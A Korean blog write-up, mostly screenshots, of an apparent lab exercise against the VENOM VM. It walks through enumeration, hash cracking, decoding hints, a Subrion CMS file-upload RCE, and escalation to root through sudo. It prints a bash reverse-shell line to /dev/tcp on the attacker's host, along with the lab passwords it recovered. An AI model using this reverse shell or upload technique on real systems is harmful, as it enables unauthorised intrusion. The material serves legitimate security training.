[+] VENOM
1.Information Gathering
![](https://blog.kakaocdn.net/dn/cjmDX6/btrWQJhNU2E/YGq4DQAMHMPt4p4lUd3tgk/img.png)
![](https://blog.kakaocdn.net/dn/A9S4s/btrWQHYBBc2/1cPGitlhRVabQhe7JWa3LK/img.png)
![](https://blog.kakaocdn.net/dn/FpC82/btrWTJ8lpot/eNpNTUl5Y63H6Qq7rvGGK0/img.png)
- enum4linux
![](https://blog.kakaocdn.net/dn/bwQ49e/btrWRcX5326/ItpZlp848xnRIJpL86BNiK/img.png)
nathan / hostinger
다 뒤져보고 다 해봤지만
소득 없음!
이럴 땐
- 소스 확인
![](https://blog.kakaocdn.net/dn/b51Fzl/btrWQtsDv9Q/bvIv61UhxyUkSfsQWk4CtK/img.png)
: 5f2a66f947fa5690c26506f66bde5c23
- 해시 타입 확인
![](https://blog.kakaocdn.net/dn/drEXV0/btrWQK8Kx3b/b54ZAhw0hpkwnjD2FMiia1/img.png)
- 복호화
![](https://blog.kakaocdn.net/dn/OVinp/btrWU6PCUnd/xlLo9s5tDltUkRMks26mzk/img.png)
: hostinger
- ftp 로그인
![](https://blog.kakaocdn.net/dn/p5atU/btrWQ5kwkZL/i4vqyoWYOlQPecC1HI77Z1/img.png)
![](https://blog.kakaocdn.net/dn/rws38/btrWRyNnwdU/4mRaKf1xDbgvvPExFohlA1/img.png)
: 힌트도 받고 업로드도 되고!
- 힌트 확인
![](https://blog.kakaocdn.net/dn/clfg0R/btrWQIiUp1n/yKftsapINWyKgRozRO4C31/img.png)
: hostinger가 salt key 인가?
: WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=
: aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
: dora password
: venom.box
: L7f9l8@J#p%Ue+Q1234 - 디코드 시 어드민 비번
> dora가 admin이고 이 친구 비번이 암호화되어 저장되었다는 듯
- 우선 /etc/hosts
![](https://blog.kakaocdn.net/dn/vVXf0/btrWRy7Crgy/NDHhLFCzP2HIPWTrRMhJuK/img.png)
- 붙어보면
![](https://blog.kakaocdn.net/dn/udmOx/btrWRx8K3fd/ckYGv9UWO5AAWKhBXmQqXK/img.png)
![](https://blog.kakaocdn.net/dn/blS1l8/btrWU7nt20C/FcYSVAYb6hAQRdzbK3dwN1/img.png)
![](https://blog.kakaocdn.net/dn/bmggZg/btrWRWtyrDa/fa7Q14wItw1Rq42wY635T1/img.png)
2. Exploitation
- 디코딩
![](https://blog.kakaocdn.net/dn/dvjg0g/btrWRkIrVMo/4QEcc5kV5I75ZDRKryaKpK/img.png)
풀이해 보면
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* You need to follow the "hostinger" on 'standard vigenere cipher'
also https://cryptii.com/pipes/vigenere-cipher
- 복호화
![](https://blog.kakaocdn.net/dn/biS0MG/btrWVKeCaIu/7sQsDLmX3kLLIHS35rsoy1/img.png)
- 로그인
![](https://blog.kakaocdn.net/dn/cGbdyJ/btrWUbXXsRU/LWnUMKXdWL2Q5KRJO8kpf1/img.png)
![](https://blog.kakaocdn.net/dn/laWVE/btrWQX7YLv2/moBAHIRgGdeYyShSAKqgHK/img.png)
I'm in!
- upload shell
https://vk9-sec.com/subrion-cms-4-2-1-arbitrary-file-upload-authenticated-2018-19422/
가이드 따라 올리고
![](https://blog.kakaocdn.net/dn/5OPg4/btrWR8tT8lQ/9d4WxTWrsv9r2t1XFOJgQK/img.png)
- Link 들어가 실행해 보면
![](https://blog.kakaocdn.net/dn/d77yL6/btrWQYMAaJQ/wcGMJVUQdVrqyvoqDrHVL1/img.png)
RCE 가능!
- 리스너 기동 후 붙어주면
![](https://blog.kakaocdn.net/dn/bPPucv/btrWQJoCrlV/DRlHKhPrhUwUR8bUFHKP4K/img.png)
침투 성공!
# 과정을 생략했지만
요약하면
1) kali에서 bash 쉘 실행 파일 생성 후
#!/bin/bash
bash -i >&/dev/tcp/192.168.10.105/443 0>&1
2) 칼리에서 파이썬 웹 서버 기동해 주고
RCE를 통해 파일 받고 실행 권한 주고
실행하면 됨!
![](https://blog.kakaocdn.net/dn/eeWyIg/btrWSvWMWzK/NfNlHfbQ7SEUrTlSq9KkFK/img.png)
upload 경로에 바로 올라간 걸 보니
RCE 스크립트가 아니라 쉘을 바로
올렸어도 되었을 듯!
3. Privilege Escalation
hostinger 사용자로 업!
![](https://blog.kakaocdn.net/dn/p4EPi/btrWRjQnvvK/PjB564SLl79al5n1lha4zK/img.png)
- .bash_history 뒤져보고
![](https://blog.kakaocdn.net/dn/NhYMu/btrWRWtyrBd/R5kz9AS27ejIr1n95YwXF0/img.png)
: 힌트대로 찾아 해본다.
- nathan?
![](https://blog.kakaocdn.net/dn/bdcmhY/btrWUGwM15x/s4ZpK16A3lmnwe5w91VIK1/img.png)
nathan!
- sudo -l?
![](https://blog.kakaocdn.net/dn/cx9m0v/btrWS2AcsGc/vFP5KkKcDa4pmhbuU1rckK/img.png)
빈수 빼고 다?
- root 비번 변경 후
![](https://blog.kakaocdn.net/dn/oE8mn/btrWRcqhe8T/sKrW9kxsS30kn3fLoSkDi1/img.png)
root!